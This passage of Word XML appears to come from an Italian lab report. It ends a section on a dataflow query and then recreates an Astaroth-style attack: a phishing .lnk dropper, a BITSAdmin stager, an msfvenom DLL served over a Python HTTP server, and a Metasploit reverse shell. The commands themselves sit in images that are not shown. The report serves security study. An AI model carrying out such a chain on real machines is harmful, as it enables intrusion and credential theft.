        <w:t>. L'argomento di dimensione di "memcpy" viene considerato una possibile destinazione di dati non attendibili in quanto potrebbe ricevere dati provenienti da fonti non affidabili.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509D63B" w14:textId="15AABC87" w:rsidR="00D92B79" w:rsidRPr="00054CF5" w:rsidRDefault="006C17AB" w:rsidP="007831E7">
      <w:r>
        <w:t>Infine, viene eseguita una query che individua i percorsi di flusso dei dati tra le sorgenti "NetworkByteSwap" e le destinazioni "memcpy" utilizzando le configurazioni specificate dalla classe "Config".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F83493" w14:textId="54C85F37" w:rsidR="00B01208" w:rsidRPr="00846774" w:rsidRDefault="00F85B57" w:rsidP="00C620C3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc140165803"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cyber</w:t>
      </w:r>
      <w:r w:rsidR="00B65C31">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Threat</w:t>
      </w:r>
      <w:r w:rsidR="00560AA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E2808">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00560AA9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Astaroth</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="0844252F" w14:textId="3039C99C" w:rsidR="002E351F" w:rsidRDefault="002E351F" w:rsidP="00B01208">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45215659" wp14:editId="7A0DC8C1">
            <wp:extent cx="1752600" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2107132179" name="Immagine 1" descr="New Astaroth Trojan Variant Exploits Anti-Malware Software to Stea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staroth Trojan Variant Exploits Anti-Malware Software to Steal Info"/>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backgroundRemoval t="18889" b="80889" l="38203" r="60938">
                                  <a14:foregroundMark x1="48281" y1="19111" x2="52422" y2="20000"/>
                                  <a14:foregroundMark x1="41016" y1="66000" x2="48203" y2="79333"/>
                                  <a14:foregroundMark x1="48203" y1="79333" x2="56094" y2="75111"/>
                                  <a14:foregroundMark x1="56094" y1="75111" x2="60391" y2="53556"/>
                                  <a14:foregroundMark x1="60391" y1="53556" x2="59062" y2="33333"/>
                                  <a14:foregroundMark x1="59062" y1="33333" x2="59062" y2="33333"/>
                                  <a14:foregroundMark x1="40391" y1="64000" x2="45938" y2="78000"/>
                                  <a14:foregroundMark x1="45938" y1="78000" x2="50469" y2="81111"/>
                                  <a14:foregroundMark x1="38281" y1="47778" x2="38672" y2="58000"/>
                                  <a14:foregroundMark x1="51484" y1="17556" x2="57891" y2="27778"/>
                                  <a14:foregroundMark x1="57891" y1="27778" x2="60938" y2="50222"/>
                                  <a14:foregroundMark x1="60938" y1="50222" x2="60156" y2="65333"/>
                                </a14:backgroundRemoval>
                              </a14:imgEffect>
                            </a14:imgLayer>
                          </a14:imgProps>
                        </a:ext>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="35973" t="14678" r="37656" b="15194"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1752600" cy="16383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4331EE8" w14:textId="2E26241C" w:rsidR="000C434F" w:rsidRDefault="000C434F" w:rsidP="008055AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Astaroth è un tipo di malware scoperto nel 2018. Il malware Astaroth è una sofisticata minaccia che si diffonde principalmente tramite campagne di phishing e sfrutta tecniche avanzate per eludere i sistemi di sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541774D0" w14:textId="18359D86" w:rsidR="007E2808" w:rsidRDefault="000C434F" w:rsidP="008055AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Il malware Astaroth è stato progettato per rubare informazioni sensibili, come le credenziali di accesso, dalle vittime infettate. Utilizza diverse tecniche per raggiungere questo obiettivo, tra cui l'uso di processi senza file, l'uso di comandi legittimi di Windows e la distribuzione di moduli di phishing personalizzati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E06EC34" w14:textId="0453EC5F" w:rsidR="006944C7" w:rsidRDefault="006944C7" w:rsidP="008055AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Vediamo uno scenario di attacco:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415727F7" w14:textId="1710BCD3" w:rsidR="00BF4D6D" w:rsidRDefault="00BF4D6D" w:rsidP="000C434F">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF4D6D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7828B4FA" wp14:editId="51A3B013">
            <wp:extent cx="6645910" cy="4136390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6044387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8743" name="Immagine 1" descr="Immagine che contiene testo, schermata, diagramma, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId121"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4136390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3325A3B5" w14:textId="77777777" w:rsidR="00635E48" w:rsidRDefault="00635E48" w:rsidP="000C434F">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2BC9E4" w14:textId="77777777" w:rsidR="00492635" w:rsidRDefault="00492635" w:rsidP="000C434F">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50246623" w14:textId="51C0FA1D" w:rsidR="00922482" w:rsidRDefault="00922482" w:rsidP="00922482">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>L'aggressore genera un file "</w:t>
      </w:r>
      <w:r w:rsidRPr="00233ADF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.lnk</w:t>
      </w:r>
      <w:r>
        <w:t>" dannoso ("</w:t>
      </w:r>
      <w:r w:rsidRPr="00233ADF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dropper</w:t>
      </w:r>
      <w:r>
        <w:t>"), utilizzando script bat/vbs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDCB445" w14:textId="77777777" w:rsidR="00922482" w:rsidRDefault="00922482" w:rsidP="009F43EB">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>L'utente esegue il file "</w:t>
      </w:r>
      <w:r w:rsidRPr="00233ADF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.lnk</w:t>
      </w:r>
      <w:r>
        <w:t>" (phishing), che scarica ed esegue un altro script dannoso ("</w:t>
      </w:r>
      <w:r w:rsidRPr="00233ADF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>stager</w:t>
      </w:r>
      <w:r>
        <w:t>").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA0CEDB" w14:textId="77777777" w:rsidR="00922482" w:rsidRDefault="00922482" w:rsidP="00CC28F7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00233ADF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Stager </w:t>
      </w:r>
      <w:r>
        <w:t>scarica un "</w:t>
      </w:r>
      <w:r w:rsidRPr="00233ADF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.dll</w:t>
      </w:r>
      <w:r>
        <w:t>" dannoso (da Metasploit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339F2493" w14:textId="03786AAB" w:rsidR="00492635" w:rsidRPr="007E2808" w:rsidRDefault="00922482" w:rsidP="00CC28F7">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00233ADF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Stager </w:t>
      </w:r>
      <w:r>
        <w:t>esegue il file "</w:t>
      </w:r>
      <w:r w:rsidRPr="00233ADF">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.dll</w:t>
      </w:r>
      <w:r>
        <w:t>", che apre una shell inversa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED2F0C" w14:textId="6BB3993C" w:rsidR="00560AA9" w:rsidRDefault="00C620C3" w:rsidP="004636A4">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc140165804"/>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="004636A4">
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="0085068D">
        <w:t xml:space="preserve"> Fase uno</w:t>
      </w:r>
      <w:r w:rsidR="00F83521">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0085068D">
        <w:t xml:space="preserve"> creazione </w:t>
      </w:r>
      <w:r w:rsidR="00F83521">
        <w:t>“clikme.lnk”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="267856BF" w14:textId="72F43C15" w:rsidR="00DF46FE" w:rsidRDefault="00AD76E7" w:rsidP="008055AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Nella prima fase andiamo a generare il file clikme.ink utilizzando il file create_</w:t>
      </w:r>
      <w:r w:rsidR="008055AA">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ropper_lnk.vbs</w:t>
      </w:r>
      <w:r w:rsidR="008055AA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8ACAC8" w14:textId="5E7AC22E" w:rsidR="008055AA" w:rsidRPr="00F83521" w:rsidRDefault="00DF46FE" w:rsidP="008055AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="091E1406" wp14:editId="484A46B3">
            <wp:extent cx="6659880" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1590892833" name="Immagine 3" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticament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2833" name="Immagine 3" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId122"/>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l="8026" t="22168" r="29343" b="42160"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6672350" cy="2137595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7743671A" w14:textId="78A7748E" w:rsidR="00B05286" w:rsidRDefault="001D7C62" w:rsidP="00CE69F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il file .LNK scarica ed esegue </w:t>
      </w:r>
      <w:r w:rsidR="009A6618">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">stager.cmd </w:t>
      </w:r>
      <w:r w:rsidR="009A6618">
        <w:t>e successivamente lo elimina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E993E8" w14:textId="0448FDAA" w:rsidR="00DC12A0" w:rsidRDefault="00C620C3" w:rsidP="00DC12A0">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc140165805"/>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="009A6618">
        <w:t xml:space="preserve">.3 Fase due, </w:t>
      </w:r>
      <w:r w:rsidR="00B16ABD">
        <w:t>stager.cmd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="236C27C4" w14:textId="2AD48470" w:rsidR="00B16ABD" w:rsidRDefault="00DC12A0" w:rsidP="00B16ABD">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27463C68" wp14:editId="2911A5CA">
            <wp:extent cx="6648450" cy="1848901"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1387147000" name="Immagine 4"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7000" name="Immagine 4" descr="Immagine che contiene schermata, diagramma, linea&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId124">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="6306"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6654982" cy="1850717"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E928893" w14:textId="5B1CA127" w:rsidR="00DC12A0" w:rsidRDefault="000F24B1" w:rsidP="00CE69F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Lo stager utilizza BITSAdmin per scaricare una DLL dannosa (utilizzando HTTP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9DC8B4" w14:textId="671628BB" w:rsidR="000F24B1" w:rsidRDefault="00EA093A" w:rsidP="00CE69F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Lo stager crea un VBScript temporaneo Il VBSript crea "launcher.lnk", lo nasconde in ADS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0760D2AE" w14:textId="6CB32ED5" w:rsidR="00DC12A0" w:rsidRDefault="00EA093A" w:rsidP="00CE69F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il file è presente nella repo </w:t>
      </w:r>
      <w:r w:rsidR="00CB6CB2">
        <w:t xml:space="preserve">all’interno dell’archivio </w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:history="1">
        <w:r w:rsidR="00CB6CB2" w:rsidRPr="00141B06">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>fileCreati</w:t>
        </w:r>
        <w:r w:rsidR="00141B06" w:rsidRPr="00141B06">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A7404EB" w14:textId="77777777" w:rsidR="002039EB" w:rsidRDefault="002039EB" w:rsidP="00B16ABD">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157ACB3A" w14:textId="5FB83FCA" w:rsidR="00141B06" w:rsidRDefault="002039EB" w:rsidP="00B16ABD">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39732266" wp14:editId="77D61A42">
            <wp:extent cx="6315075" cy="5921501"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1941572351" name="Immagine 5" descr="Immagine che contiene testo, elettronica, schermata, software&#10;&#10;Descrizione generata automaticament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2351" name="Immagine 5" descr="Immagine che contiene testo, elettronica, schermata, software&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId126"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId127">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2723" t="3568" r="46684" b="12094"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6331982" cy="5937354"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E030EFF" w14:textId="41238C3B" w:rsidR="009853F6" w:rsidRDefault="009853F6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E11A5E1" w14:textId="272C9CCA" w:rsidR="00A0716F" w:rsidRDefault="00C620C3" w:rsidP="00A0716F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc140165806"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00A0716F">
        <w:t>.4 Fase tre, generazione payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="0BC7803D" w14:textId="5B8274CA" w:rsidR="003A2ACD" w:rsidRDefault="008B16B0" w:rsidP="00CE69F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Per generare la dll dannosa utilizziamo msfvenom da Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00161522">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D5D57" w14:textId="718AB9ED" w:rsidR="00161522" w:rsidRDefault="00161522" w:rsidP="00242273">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EFE2A79" wp14:editId="1DDF14C6">
            <wp:extent cx="6340376" cy="2266950"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1683869870" name="Immagine 6" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticament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9870" name="Immagine 6" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId128"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId129">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="5589" t="17326" r="17447" b="33752"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6348390" cy="2269815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29276494" w14:textId="708FD4CC" w:rsidR="002C57BB" w:rsidRDefault="00C620C3" w:rsidP="00AE0426">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc140165807"/>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00AE0426">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00AE0426">
        <w:t xml:space="preserve"> Fase </w:t>
      </w:r>
      <w:r>
        <w:t>quattro</w:t>
      </w:r>
      <w:r w:rsidR="00AE0426">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>configurazione del server python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="7BEED7DF" w14:textId="77777777" w:rsidR="00272887" w:rsidRDefault="00AD0553" w:rsidP="00CE69F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>La macchina vittima (ad esempio, una macchina virtuale Windows) scarica la DLL dalla macchina dell'aggressore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E6181" w14:textId="1C6F7BD8" w:rsidR="00C620C3" w:rsidRDefault="00AD0553" w:rsidP="00CE69F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilizziamo il modulo Python SimpleHTTPServer per creare un server </w:t>
      </w:r>
      <w:r w:rsidR="00272887">
        <w:t xml:space="preserve">http il quale renderà disponibile scaricare </w:t>
      </w:r>
      <w:r>
        <w:t>stager.cmd e payload.dll</w:t>
      </w:r>
      <w:r w:rsidR="00272887">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A32C8D" w14:textId="57AD34FC" w:rsidR="00272887" w:rsidRPr="00C620C3" w:rsidRDefault="00896BD6" w:rsidP="00AD0553">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37013F04" wp14:editId="7840C788">
            <wp:extent cx="6645910" cy="3738245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1903248056" name="Immagine 8" descr="Immagine che contiene testo, schermata, computer, software&#10;&#10;Descrizione generata automaticament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8056" name="Immagine 8" descr="Immagine che contiene testo, schermata, computer, software&#10;&#10;Descrizione generata automaticamente">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B30B148" w14:textId="5C5FA7D5" w:rsidR="00322129" w:rsidRDefault="00322129">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09992E70" w14:textId="5A3B1A8B" w:rsidR="006953EB" w:rsidRDefault="00EA5857" w:rsidP="006953EB">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc140165808"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.6 Fase cinque, Metasploit </w:t>
      </w:r>
      <w:r w:rsidR="007E2F54">
        <w:t>reverse shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="2050A079" w14:textId="77777777" w:rsidR="00506565" w:rsidRDefault="00506565" w:rsidP="006953EB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5422B7D4" w14:textId="1B8389F8" w:rsidR="00AF4C7F" w:rsidRDefault="00B818D8" w:rsidP="006953EB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4158D320" wp14:editId="6DB3885F">
            <wp:extent cx="3533140" cy="4093926"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2017523905"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3905" name="Immagine 9" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
